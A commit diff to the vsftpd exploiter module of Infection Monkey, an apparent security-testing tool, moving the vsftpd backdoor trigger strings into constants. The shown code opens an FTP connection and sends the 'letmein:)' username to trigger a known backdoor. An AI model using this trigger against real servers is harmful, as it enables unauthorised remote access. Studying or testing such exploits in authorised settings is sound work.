Update vsftpd.py

Removed unused imports, removed hardcoded username and password. Removed EXPLOIT_TYPE Removed NONE in tatget_os_type Reduced time to sleep from 2 to 1
2019-03-12 12:37:09 +01:00 · 2019-03-12 12:37:09 +01:00 · dade4daad2
parent 0b3e6274d9
commit dade4daad2
1 changed files with 9 additions and 11 deletions
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ b/monkey/infection_monkey/exploit/vsftpd.py
@ -1,15 +1,11 @@
 import logging
 from logging import getLogger
 import time
 import paramiko
 import StringIO
 import socket 
 import sys 
 import time
 import infection_monkey.monkeyfs as monkeyfs
 from infection_monkey.exploit import HostExploiter
 from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
 from infection_monkey.model import MONKEY_ARG
@ -23,11 +19,13 @@ __author__ = 'D3fa1t'
 FTP_PORT = 21
 TRANSFER_UPDATE_RATE = 15
-COMMAND = "uname -a"
+USERNAME = b'USER letmein:)\n'
 PASSWORD = b'PASS please\n'
 class VSFTPDExploiter(HostExploiter):
-    _TARGET_OS_TYPE = ['linux', None]
+    _TARGET_OS_TYPE = ['linux']
    EXPLOIT_TYPE = ExploitType.OTHER
    def __init__(self, host):
        self._update_timestamp = 0
@ -41,9 +39,9 @@ class VSFTPDExploiter(HostExploiter):
            ftp_socket.connect((self.host.ip_addr, FTP_PORT))
            # Attempt to login to trigger backdoor
-            ftp_socket.send(b'USER letmein:)\n')
+            ftp_socket.send(USERNAME)
-            ftp_socket.send(b'PASS please\n')
+            ftp_socket.send(PASSWORD)
-            time.sleep(2)
+            time.sleep(1)
            ftp_socket.close()
            LOG.info('[+] Triggered backdoor')